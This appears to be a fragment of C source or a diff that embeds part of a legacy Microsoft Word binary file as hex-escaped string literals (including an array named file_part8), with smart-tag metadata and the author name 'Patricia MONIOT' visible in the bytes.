-"\x4f\x39\x01\x30\x00\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" -"\x01\x00\x00\x00\x8c\x0f\xae\x00\x20\x2c\x61\x07\x39\x00\x00\x00" -"\x02\x30\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x64\x00\x00\x00" -"\x02\x00\x00\x00\x23\x00\x20\x05\x4f\x39\x01\x30\x00\x30\x00\x00" -"\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x8c\x0f\xae\x00" -"\x20\x2c\x61\x07\x39\x00\x00\x00\x02\x30\x00\x00\x06\x00\x00\x00" -"\xa9\x00\x00\x00\x64\x00\x00\x00\x02\x00\x00\x00\x23\x00\x20\x05" -"\x4f\x39\x01\x30\x06\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" -"\x01\x00\x00\x00\x8c\x0f\xae\x00\xc8\x2c\x61\x07\x58\x00\x00\x00" -"\x01\x30\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00" -"\x01\x00\x00\x00\x5b\x00\xa0\x05\x4f\x39\x01\x30\x00\x30\x00\x00" -"\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" -"\x8c\x0f\xae\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00" -"\x39\x00\x00\x00\x39\x00\x00\x00\x3c\x00\x00\x00\x00\x06\x00\x00" -"\xa4\x47\x00\x00\xb4\x5b\x00\x00\xe1\x6d\x00\x00\x0a\x76\x00\x00" -"\xfd\x7b\x00\x00\x1a\x7c\x00\x00\x3f\x00\x00\x00\x48\x00\x00\x00" -"\x4d\x00\x00\x00\x51\x00\x00\x00\x78\x00\x00\x00\x80\x00\x00\x00" -"\x00\x06\x00\x00\x62\x0d\x00\x00\x7f\x1b\x00\x00\x40\x2b\x00\x00" -"\x23\x34\x00\x00\x09\x40\x00\x00\x51\x43\x00\x00\xef\x4c\x00\x00" -"\x87\x53\x00\x00\xfb\x58\x00\x00\xe7\x5b\x00\x00\xeb\x5e\x00\x00" -"\x45\x64\x00\x00\xed\x68\x00\x00\xe2\x6d\x00\x00\x29\x6f\x00\x00" -"\xaa\x6f\x00\x00\xdd\x6f\x00\x00\x11\x70\x00\x00\x3e\x70\x00\x00" -"\x6e\x70\x00\x00\xa2\x70\x00\x00\xd9\x70\x00\x00\x05\x71\x00\x00" -"\x31\x71\x00\x00\x5f\x71\x00\x00\x8c\x71\x00\x00\xbf\x71\x00\x00" -"\xe4\x71\x00\x00\x07\x72\x00\x00\x3f\x72\x00\x00\x6c\x72\x00\x00" -"\x9e\x72\x00\x00\xd4\x72\x00\x00\x03\x73\x00\x00\x31\x73\x00\x00" -"\x55\x73\x00\x00\x80\x73\x00\x00\xaa\x73\x00\x00\xe5\x73\x00\x00" 
-"\x11\x74\x00\x00\x40\x74\x00\x00\x66\x74\x00\x00\x87\x74\x00\x00" -"\xb7\x74\x00\x00\xf0\x74\x00\x00\x20\x75\x00\x00\x54\x75\x00\x00" -"\x7a\x75\x00\x00\x9d\x75\x00\x00\xc7\x75\x00\x00\x02\x76\x00\x00" -"\x36\x76\x00\x00\x60\x76\x00\x00\x88\x76\x00\x00\xa9\x76\x00\x00" -"\xd2\x76\x00\x00\x07\x77\x00\x00\x3d\x77\x00\x00\x1a\x7c\x00\x00" -"\x40\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" -"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x49\x00\x00\x00" -"\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00\x4e\x00\x00\x00" -"\x4f\x00\x00\x00\x50\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00" -"\x54\x00\x00\x00\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00" -"\x58\x00\x00\x00\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00" -"\x5c\x00\x00\x00\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00" -"\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00" -"\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00" -"\x68\x00\x00\x00\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00" -"\x6c\x00\x00\x00\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00" -"\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00" -"\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00" -"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" -"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x00\x06\x00\x00" -"\x19\x7c\x00\x00\x41\x00\x00\x00\x16\x00\x00\x00\x1d\x00\x00\x00" -"\x1f\x00\x00\x00\x3c\x00\x00\x00\x13\x21\xf4\xff\x95\x80\xff\xff" -"\x23\x00\x00\x00\x06\x00\xd7\x43\x05\x00\x00\x00\x02\x00\x74\x0e" -"\x29\x04\x06\x00\xd8\x43\x05\x00\x00\x00\x02\x00\xb4\x0e\x29\x04" -"\x06\x00\xd9\x43\x05\x00\x00\x00\x02\x00\xf4\x0e\x29\x04\x06\x00" -"\xda\x43\x05\x00\x00\x00\x02\x00\x7c\x09\x29\x04\x06\x00\xdb\x43" -"\x05\x00\x00\x00\x02\x00\x6c\xee\x28\x04\x06\x00\xdc\x43\x05\x00" -"\x00\x00\x02\x00\xac\xee\x28\x04\x06\x00\xdd\x43\x05\x00\x00\x00" -"\x02\x00\x3c\xeb\x28\x04\x06\x00\xde\x43\x05\x00\x00\x00\x02\x00" 
-"\x7c\xeb\x28\x04\x06\x00\xdf\x43\x05\x00\x00\x00\x02\x00\xbc\xeb" -"\x28\x04\x06\x00\xe0\x43\x05\x00\x00\x00\x02\x00\x54\xe8\x28\x04" -"\x06\x00\xe1\x43\x05\x00\x00\x00\x02\x00\x94\xe8\x28\x04\x06\x00" -"\xe2\x43\x05\x00\x00\x00\x02\x00\xd4\xe8\x28\x04\x06\x00\xe3\x43" -"\x05\x00\x00\x00\x02\x00\x8c\xdd\x28\x04\x06\x00\xe4\x43\x05\x00" -"\x00\x00\x02\x00\xcc\xdd\x28\x04\x06\x00\xe5\x43\x05\x00\x00\x00" -"\x02\x00\x0c\xde\x28\x04\x06\x00\xe6\x43\x05\x00\x00\x00\x02\x00" -"\xcc\xda\x28\x04\x06\x00\xe7\x43\x05\x00\x00\x00\x02\x00\x0c\xdb" -"\x28\x04\x06\x00\xe8\x43\x05\x00\x00\x00\x02\x00\x4c\xdb\x28\x04" -"\x06\x00\xe9\x43\x05\x00\x00\x00\x02\x00\x8c\xd5\x28\x04\x06\x00" -"\xea\x43\x05\x00\x00\x00\x02\x00\xcc\xd5\x28\x04\x06\x00\xeb\x43" -"\x05\x00\x00\x00\x02\x00\x0c\xd6\x28\x04\x06\x00\xec\x43\x05\x00" -"\x00\x00\x02\x00\xa4\xd2\x28\x04\x06\x00\xed\x43\x05\x00\x00\x00" -"\x02\x00\xe4\xd2\x28\x04\x06\x00\xee\x43\x05\x00\x00\x00\x02\x00" -"\x24\xd3\x28\x04\x06\x00\xef\x43\x05\x00\x00\x00\x02\x00\x7c\xcf" -"\x28\x04\x06\x00\xf0\x43\x05\x00\x00\x00\x02\x00\xbc\xcf\x28\x04" -"\x06\x00\xf1\x43\x05\x00\x00\x00\x02\x00\xfc\xcf\x28\x04\x06\x00" -"\xf2\x43\x05\x00\x00\x00\x02\x00\x6c\xcc\x28\x04\x06\x00\xf3\x43" -"\x05\x00\x00\x00\x02\x00\xac\xcc\x28\x04\x06\x00\xf4\x43\x05\x00" -"\x00\x00\x02\x00\xec\xcc\x28\x04\x06\x00\xf5\x43\x05\x00\x00\x00" -"\x02\x00\x84\xc9\x28\x04\x06\x00\xf6\x43\x05\x00\x00\x00\x02\x00" -"\xc4\xc9\x28\x04\x06\x00\xf7\x43\x05\x00\x00\x00\x02\x00\x04\xca" -"\x28\x04\x06\x00\xf8\x43\x05\x00\x00\x00\x02\x00\xe4\xc5\x28\x04" -"\x06\x00\xf9\x43\x05\x00\x00\x00\x02\x00\x24\xc6\x28\x04\x25\x01" -"\x00\x00\x55\x01\x00\x00\x04\x0d\x00\x00\x8e\x13\x00\x00\x68\x16" -"\x00\x00\x5e\x17\x00\x00\x07\x18\x00\x00\x4f\x1e\x00\x00\x42\x20" -"\x00\x00\xfb\x20\x00\x00\x74\x23\x00\x00\x2c\x26\x00\x00\x02\x52" -"\x00\x00\x9d\x52\x00\x00\x00\x53\x00\x00\x7c\x53\x5e\x00\xae\x53" -"\x00\x00\x2b\x54\x00\x00\x9f\x56\x00\x00\xc7\x56\x00\x00\xe6\x56" 
-"\x00\x00\xa0\x57\x00\x00\xec\x57\x00\x00\x85\x5a\x00\x00\x90\x5a" -"\x00\x00\x48\x5b\x00\x00\xff\x5c\x00\x00\xad\x67\x00\x00\xe0\x67" -"\x00\x00\x15\x68\x00\x00\x4c\x68\x00\x00\x4f\x68\x00\x00\x20\x6b" -"\x00\x00\x5c\x6d\x00\x00\x6d\x6f\x00\x00\x1b\x74\x00\x00\x00\x00" -"\x00\x00\x01\x00\x01\x00\x00\x00\x01\x00\x02\x00\x00\x00\x01\x00" -"\x03\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x05\x00\x00\x00" -"\x01\x00\x06\x00\x00\x00\x01\x00\x07\x00\x00\x00\x01\x00\x08\x00" -"\x00\x00\x01\x00\x09\x00\x00\x00\x01\x00\x0a\x00\x00\x00\x01\x00" -"\x0b\x00\x00\x00\x01\x00\x0c\x00\x00\x00\x01\x00\x0d\x00\x00\x00" -"\x01\x00\x0e\x00\x00\x00\x01\x00\x0f\x00\x00\x00\x01\x00\x10\x00" -"\x00\x00\x01\x00\x11\x00\x00\x00\x01\x00\x12\x00\x00\x00\x01\x00" -"\x13\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x15\x00\x00\x00" -"\x01\x00\x16\x00\x00\x00\x01\x00\x17\x00\x00\x00\x01\x00\x18\x00" -"\x00\x00\x01\x00\x19\x00\x00\x00\x01\x00\x1a\x00\x00\x00\x01\x00" -"\x1b\x00\x00\x00\x01\x00\x1c\x00\x00\x00\x01\x00\x1d\x00\x00\x00" -"\x01\x00\x1e\x00\x00\x00\x01\x00\x1f\x00\x00\x00\x01\x00\x20\x00" -"\x00\x00\x01\x00\x21\x00\x00\x00\x01\x00\x22\x00\x00\x00\x01\x00" -"\x2a\x01\x00\x00\x5a\x01\x00\x00\x09\x0d\x00\x00\x90\x13\x00\x00" -"\x6a\x16\x00\x00\x60\x17\x00\x00\x09\x18\x00\x00\x51\x1e\x00\x00" -"\x44\x20\x00\x00\xfd\x20\x00\x00\x76\x23\x00\x00\x2e\x26\x00\x00" -"\x04\x52\x00\x00\x9f\x52\x00\x00\x02\x53\x00\x00\x7e\x53\x00\x00" -"\xb0\x53\x00\x00\x2d\x54\x00\x00\xa1\x56\x00\x00\xc9\x56\x00\x00" -"\xe8\x56\x00\x00\xa2\x57\x00\x00\xee\x57\x00\x00\x87\x5a\x00\x00" -"\x92\x5a\x00\x00\x4a\x5b\x00\x00\x01\x5d\x00\x00\xaf\x67\x00\x00" -"\xe2\x67\x00\x00\x17\x68\x00\x00\x4e\x68\x00\x00\x51\x68\x00\x00" -"\x24\x6b\x00\x00\x61\x6d\x00\x00\x72\x6f\x00\x00\x1b\x74\x00\x00" -"\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00" -"\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00" -"\x08\x00\x00\x00\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00" 
-"\x0c\x00\x00\x00\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00" -"\x10\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00" -"\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00" -"\x18\x00\x00\x00\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00" -"\x1c\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00" -"\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00" -"\x3e\x00\x00\x00\x23\x00\x00\x00\x2a\x80\x75\x72\x6e\x3a\x73\x63" -"\x68\x65\x6d\x61\x73\x2d\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2d" -"\x63\x6f\x6d\x3a\x6f\x66\x66\x69\x63\x65\x3a\x73\x6d\x61\x72\x74" -"\x74\x61\x67\x73\x0a\x80\x50\x65\x72\x73\x6f\x6e\x4e\x61\x6d\x65" -"\x00\x80\x0c\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x23\x00" -"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" -"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" -"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" -"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" -"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" -"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" -"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" -"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" -"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\xd3\x00\x00\x00\x23\x00" -"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" -"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" -"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" -"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x54\x50\x00\x00\x5a\x50\x00\x00\xc3\x50\x00\x00" -"\xc8\x50\x00\x00\xfd\x50\x00\x00\x05\x51\x00\x00\x55\x51\x00\x00" -"\x5c\x51\x00\x00\xcd\x67\x00\x00\xd7\x67\x00\x00\x00\x68\x00\x00" -"\x0c\x68\x00\x00\x1e\x68\x00\x00\x24\x68\x00\x00\x57\x68\x00\x00" -"\x5e\x68\x00\x00\x6e\x68\x00\x00\x75\x68\x00\x00\x92\x68\x00\x00" 
-"\x99\x68\x00\x00\xc3\x68\x00\x00\xd0\x68\x00\x00\xdd\x68\x00\x00" -"\xe5\x68\x00\x00\x3c\x69\x00\x00\x45\x69\x00\x00\x8c\x69\x00\x00" -"\x95\x69\x00\x00\xda\x69\x00\x00\xe3\x69\x00\x00\x47\x6a\x00\x00" -"\x4d\x6a\x00\x00\xed\x6a\x00\x00\xf3\x6a\x00\x00\x03\x6b\x00\x00" -"\x0a\x6b\x00\x00\x29\x6b\x00\x00\x30\x6b\x00\x00\x70\x6b\x00\x00" -"\x77\x6b\x00\x00\xdc\x6b\x00\x00\xe0\x6b\x00\x00\x6e\x6c\x00\x00" -"\x78\x6c\x00\x00\x8b\x6c\x00\x00\x91\x6c\x00\x00\xa5\x6c\x00\x00" -"\xb2\x6c\x00\x00\xd6\x6c\x00\x00\xdd\x6c\x00\x00\xe0\x6c\x00\x00" -"\xe6\x6c\x00\x00\x42\x6d\x00\x00\x4b\x6d\x00\x00\x4c\x6d\x00\x00" -"\x53\x6d\x00\x00\x65\x6d\x00\x00\x6a\x6d\x00\x00\xac\x6d\x00\x00" -"\xba\x6d\x00\x00\xf5\x6d\x00\x00\xf8\x6d\x00\x00\x28\x6e\x00\x00" -"\x31\x6e\x00\x00\x43\x6e\x00\x00\x47\x6e\x00\x00\xb8\x6e\x00\x00" -"\xc3\x6e\x00\x00\xfb\x6e\x00\x00\x02\x6f\x00\x00\x0e\x6f\x00\x00" -"\x14\x6f\x00\x00\x2e\x6f\x00\x00\x3b\x6f\x00\x00\x74\x71\x00\x00" -"\x7a\x71\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00" -"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" -"\x07\x00\x04\x00\x07\x00\x07\x00\x02\x00\x00\x00\x00\x00\x80\x01" -"\x00\x00\x83\x01\x00\x00\xda\x06\x00\x00\xdb\x06\x00\x00\xa2\x0d" -"\x00\x00\xa4\x0d\x00\x00\x8e\x1b\x00\x00\x95\x1b\x00\x00\x1d\x25" -"\x00\x00\x1f\x25\x00\x00\xf8\x2e\x00\x00\x1c\x2f\x00\x00\x58\x3c" 
-"\x00\x00\x60\x3c\x00\x00\x10\x48\x00\x00\x19\x48\x00\x00\xdf\x73" -"\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x33\x00\x07\x00" -"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00" -"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x07\x00\x02\x00" -"\x00\x00\x00\x00\x1b\x4f\x00\x00\x32\x4f\x00\x00\x10\x50\x00\x00" -"\x40\x50\x00\x00\x42\x50\x00\x00\x43\x50\x00\x00\xca\x50\x00\x00" -"\xdd\x50\x00\x00\x42\x5d\x00\x00\x6f\x5d\x00\x00\x7b\x5e\x00\x00" -"\x86\x5e\x00\x00\xa3\x5f\x00\x00\xb0\x5f\x00\x00\x81\x60\x00\x00" -"\x8b\x60\x00\x00\xd4\x60\x00\x00\x07\x61\x00\x00\xa7\x67\x00\x00" -"\x34\x68\x00\x00\x54\x68\x00\x00\x6e\x68\x00\x00\xa3\x68\x00\x00" -"\xf3\x69\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00\x44\x6a\x00\x00" -"\x5d\x6a\x00\x00\x75\x6a\x00\x00\x6e\x6c\x00\x00\x7a\x6c\x00\x00" -"\x7f\x6c\x00\x00\xf3\x6c\x00\x00\x77\x6e\x00\x00\x7f\x6e\x00\x00" -"\x3e\x6f\x00\x00\xdf\x73\x00\x00\xf5\x73\x00\x00\xff\x73\x00\x00" -"\x06\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x05\x00" -"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" -"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" -"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" -"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" -"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x02\x00" -"\x00\x00\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00" -"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x04\x00\x07\x00\x07\x00" -"\x02\x00\xff\xff\x14\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00" -"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00\x08\x00\x50\x00" -"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00" -"\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00" -"\x61\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00" -"\x63\x00\x69\x00\x61\x00\x00\x00\x0f\x00\x50\x00\x61\x00\x74\x00" -"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00" 
-"\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00\x61\x00" -"\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00" -"\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00" -"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00" -"\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00" -"\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00" -"\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00" -"\x06\x00\x4d\x00\x6f\x00\x6e\x00\x69\x00\x6f\x00\x74\x00\x00\x00" -"\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x01\x00\xc9\x6e\x24\x4f" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x02\x00\x0a\x00" -"\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\xe5\x00\x00\x00\x00\x00" -"\x00\x00\x09\x00\x00\x00\x55\x3b\x1b\x00\x1e\x3b\x1d\x00\x02\x75" -"\x3b\x00\x45\x6d\x47\x00\xae\x0f\x6a\x00\xa5\x49\x73\x00\x2e\x20" -"\xb9\x00\x52\x59\xd7\x00\x3e\x75\xec\x00\x25\x31\xed\x00\x00\x00" -"\x00\x00\x15\x27\x00\x00\x90\x28\x00\x00\xef\x44\x00\x00\xde\x50" -"\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x45\x5c\x00\x00\x46\x5c" -"\x00\x00\xf1\x5e\x00\x00\xfc\x5e\x00\x00\x36\x62\x00\x00\x41\x62" -"\x00\x00\x2d\x66\x00\x00\x15\x67\x00\x00\xa6\x67\x00\x00\xa7\x67" -"\x00\x00\xaa\x67\x00\x00\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67" -"\x00\x00\xd8\x67\x00\x00\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67" -"\x00\x00\xe5\x67\x00\x00\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68" -"\x00\x00\x11\x68\x00\x00\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68" -"\x00\x00\x25\x68\x00\x00\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68" -"\x00\x00\x49\x68\x00\x00\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68" -"\x00\x00\x6e\x68\x00\x00\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68" -"\x00\x00\x89\x68\x00\x00\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68" -"\x00\x00\xc3\x68\x00\x00\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68" -"\x00\x00\xd9\x68\x00\x00\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68" -"\x00\x00\x01\x69\x00\x00\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69" 
-"\x00\x00\x13\x69\x00\x00\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69" -"\x00\x00\x31\x69\x00\x00\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69" -"\x00\x00\x55\x69\x00\x00\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69" -"\x00\x00\x63\x69\x00\x00\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69" -"\x00\x00\x8c\x69\x00\x00\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69" -"\x00\x00\xa3\x69\x00\x00\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69" -"\x00\x00\xce\x69\x00\x00\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69" -"\x00\x00\xe4\x69\x00\x00\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69" -"\x00\x00\x00\x6a\x00\x00\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a" -"\x00\x00\x22\x6a\x00\x00\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a" -"\x00\x00\x3f\x6a\x00\x00\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a" -"\x00\x00\x67\x6a\x00\x00\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a" -"\x00\x00\x75\x6a\x00\x00\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a" -"\x00\x00\x9e\x6a\x00\x00\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a" -"\x00\x00\xb6\x6a\x00\x00\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a" -"\x00\x00\xe2\x6a\x00\x00\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a" -"\x00\x00\x03\x6b\x00\x00\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b" -"\x00\x00\x20\x6b\x00\x00\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b" -"\x00\x00\x48\x6b\x00\x00\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b" -"\x00\x00\x55\x6b\x00\x00\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b" -"\x00\x00\x7c\x6b\x00\x00\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b" -"\x00\x00\x90\x6b\x00\x00\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b" -"\x00\x00\xaa\x6b\x00\x00\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b" -"\x00\x00\xcd\x6b\x00\x00\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b" -"\x00\x00\xe9\x6b\x00\x00\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c" -"\x00\x00\x11\x6c\x00\x00\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c" -"\x00\x00\x20\x6c\x00\x00\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c" -"\x00\x00\x4b\x6c\x00\x00\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c" -"\x00\x00\x66\x6c\x00\x00\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c" 
-"\x00\x00\x7f\x6c\x00\x00\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c" -"\x00\x00\xa1\x6c\x00\x00\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c" -"\x00\x00\xb7\x6c\x00\x00\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c" -"\x00\x00\xe7\x6c\x00\x00\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c" -"\x00\x00\xf8\x6c\x00\x00\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d" -"\x00\x00\x20\x6d\x00\x00\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d" -"\x00\x00\x33\x6d\x00\x00\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d" -; -char file_part8[]= -"\x00\x00\x59\x6d\x00\x00\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d" -"\x00\x00\x7a\x6d\x00\x00\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d" -"\x00\x00\x8e\x6d\x00\x00\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d" -"\x00\x00\xbb\x6d\x2c\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d" -"\x00\x00\xc7\x6d\x00\x00\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d" -"\x00\x00\xfe\x6d\x00\x00\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e" -"\x00\x00\x19\x6e\x00\x00\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e" -"\x00\x00\x37\x6e\x00\x00\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e" -"\x00\x00\x57\x6e\x00\x00\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e" 